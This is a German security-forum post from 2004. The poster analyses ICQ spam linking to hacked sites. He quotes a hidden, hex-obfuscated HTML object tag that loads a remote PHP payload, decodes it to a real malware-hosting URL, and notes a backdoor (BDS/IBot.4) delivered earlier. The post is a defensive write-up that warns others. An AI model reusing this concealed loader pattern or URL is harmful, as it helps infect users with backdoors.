Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Seltsame Odyssee bei ICQ

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 09.01.2004, 22:21   #1
Xerxes
 
Seltsame Odyssee bei ICQ - Beitrag

Seltsame Odyssee bei ICQ



Folgendes merkwürdige Verhalten ist mir nun schon zum zweiten Mal in Zusammenhang mit ICQ aufgefallen.
Da ich darüber noch nichts gefunden habe, will ich es an dieser Stelle einfach mal dokumentieren. Vielleicht hilfts ja jemandem.

Es beginnt mit einer Spam-Message von einer Person mit deutsch klingendem Namen, welche jedoch nicht im Stande ist, einen aus drei Worten bestehenden Satz fehlerfrei zu schreiben.

Die Nachricht enthält einen Link auf eine Website, wo sich ein Bild der Person befinden soll.

Diese Websiten sind jedoch offensichtlich gehackt.
So befand sich im folgenden näher beschriebene Datei unterhalb der Indexseite einer Möbeltischlereifirma. (Diese habe ich kontaktiert, worauf sie die untergejubelten Dateien entfernte, es jedoch nicht für nötig hielt, sich bei mir für diesen Hinweis zu bedanken.)

Die heutige Spam-Nachricht enthielt einen Link auf die Seite http://www.timelessimages.com/myface3.html.

myface3.html enthält diesen Code:
</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;"> &lt;html&gt; &lt;font face=&quot;System&quot;&gt;
&lt;object STYLE=&quot;display:none&quot; DATA=&quot;http://%25%37%37%25%36%35%25%36%32%2....php&quot;&gt;
&lt;/object&gt;</pre>[/QUOTE]Wie unschwer zu erkennen ist, ist die URL schlecht getarnt, indem die Einzelzeichen in hexadezimaler Schreibweise geschrieben wurde.

Übersetzt ergibt sich folgende URL:

</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">http://%77%65%62%32%31%36%2E%62%65%72%6C%69%6E%32%34%30%2E%73%65%72%76er4free.de/hp/fight/dn.php</pre>[/QUOTE]Immer noch teilweise Hexadezimal. Also den Rest nochmal umwandeln:

</font><blockquote>Code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">http://web216.berlin240.server4free.de/hp/fight/dn.php</pre>[/QUOTE]Diese URL hat folgende IP: 217.172.191.201

Löst man diese IP wieder auf, erhält man folgende URL: serverkiller.intergenia.de

Diese IP ist übrigens gegenwärtig nicht erreichbar, weswegen ich nicht feststellen konnte, was auf diesem Wege verbreitet werden sollte.

Im ersten Fall, vor 14 Tagen, war es jedenfalls ein Backdoorprogramm namens BDS/IBot.4.

[ 10. Januar 2004, 08:23: Beitrag editiert von: Xerxes ]

Antwort

Themen zu Seltsame Odyssee bei ICQ
backdoorprogramm, bild, code, data, datei, dateien, deutsch, einfach, erkennen, erreichbar, folge, folgendes, hinweis, icq, januar, kontaktiert, link, namen, namens, nichts, object, schwer, system, tiere, verhalten



Ähnliche Themen: Seltsame Odyssee bei ICQ


  1. Seltsame uploadkurve
    Netzwerk und Hardware - 11.11.2010 (4)
  2. Seltsame Probleme im PC
    Antiviren-, Firewall- und andere Schutzprogramme - 12.08.2010 (34)
  3. Seltsame Programme
    Plagegeister aller Art und deren Bekämpfung - 03.07.2009 (2)
  4. Seltsame Aktivitäten
    Log-Analyse und Auswertung - 24.03.2009 (1)
  5. seltsame verbindungen
    Plagegeister aller Art und deren Bekämpfung - 05.03.2009 (3)
  6. Seltsame Infektion...
    Log-Analyse und Auswertung - 18.11.2008 (0)
  7. Seltsame Warnmeldungen von KAV...
    Antiviren-, Firewall- und andere Schutzprogramme - 09.11.2007 (10)
  8. Seltsame dinge im IE
    Log-Analyse und Auswertung - 01.11.2007 (3)
  9. seltsame exe-Datei
    Plagegeister aller Art und deren Bekämpfung - 26.10.2007 (3)
  10. Seltsame Geschehnisse auf dem PC
    Plagegeister aller Art und deren Bekämpfung - 19.05.2007 (11)
  11. seltsame popups
    Log-Analyse und Auswertung - 06.02.2007 (1)
  12. seltsame exe-Datei ?
    Log-Analyse und Auswertung - 17.12.2006 (4)
  13. Seltsame Prozesse
    Plagegeister aller Art und deren Bekämpfung - 20.09.2006 (3)
  14. Seltsame Verbindungen
    Plagegeister aller Art und deren Bekämpfung - 23.06.2006 (3)
  15. seltsame systemabstürze
    Log-Analyse und Auswertung - 25.02.2006 (2)
  16. 4 seltsame Einträge in HJT
    Log-Analyse und Auswertung - 17.02.2006 (3)
  17. Seltsame Dateien
    Plagegeister aller Art und deren Bekämpfung - 08.04.2005 (5)

Zum Thema Seltsame Odyssee bei ICQ - Folgendes merkwürdige Verhalten ist mir nun schon zum zweiten Mal in Zusammenhang mit ICQ aufgefallen. Da ich darüber noch nichts gefunden habe, will ich es an dieser Stelle einfach mal - Seltsame Odyssee bei ICQ...
Archiv
Du betrachtest: Seltsame Odyssee bei ICQ auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.